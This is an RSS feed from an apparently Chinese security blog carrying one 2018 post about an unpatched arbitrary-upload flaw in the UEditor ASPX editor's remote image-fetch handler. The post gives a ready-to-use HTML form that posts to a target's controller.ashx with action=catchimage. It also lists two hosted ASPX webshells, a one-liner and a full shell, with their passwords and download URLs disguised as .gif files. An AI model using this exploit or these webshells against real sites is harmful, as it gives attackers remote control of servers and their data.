<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>编辑器 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E7%BC%96%E8%BE%91%E5%99%A8/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:22:22 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>ueditor编辑器上传漏洞</title>
		<link>/web/573.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 07 Oct 2018 11:12:51 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[ueditor]]></category>
		<category><![CDATA[上传]]></category>
		<category><![CDATA[编辑器]]></category>
		<guid isPermaLink="false">/?p=573</guid>

					<description><![CDATA[ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复 controller.ashx 文件默认在网站根目录 输入框里填写远程图片地址 + ?.aspx,...]]></description>
										<content:encoded><![CDATA[<p><a href="/wp-content/uploads/2018/10/2018100719173995.png"><img loading="lazy" class="aligncenter size-full wp-image-574" src="/wp-content/uploads/2018/10/2018100719173995.png" alt="" width="530" height="317" /></a></p>
<p><span class="wpcom_tag_link"><a href="/tags/ueditor" title="ueditor" target="_blank">ueditor</a></span> ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复</p>
<p><code>controller.ashx</code> 文件默认在网站根目录</p>
<p>输入框里填写远程图片地址 + <code>?.aspx</code>, 如 <code>http://exp10it.cn/1.gif?.aspx</code></p>
<pre class="lang:default decode:true ">&lt;form action="http://target/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST"&gt;
  &lt;p&gt;shell addr:&lt;input type="text" name="source[]" /&gt;&lt;/p &gt;
  &lt;input type="submit" value="Submit" /&gt;
&lt;/form&gt;</pre>
<p>&nbsp;</p>
<p>一句话 密码 <code>xz</code></p>
<p><code>https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx</code></p>
<p>大马 密码 <code>r00ts</code></p>
<p><code>https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx</code></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
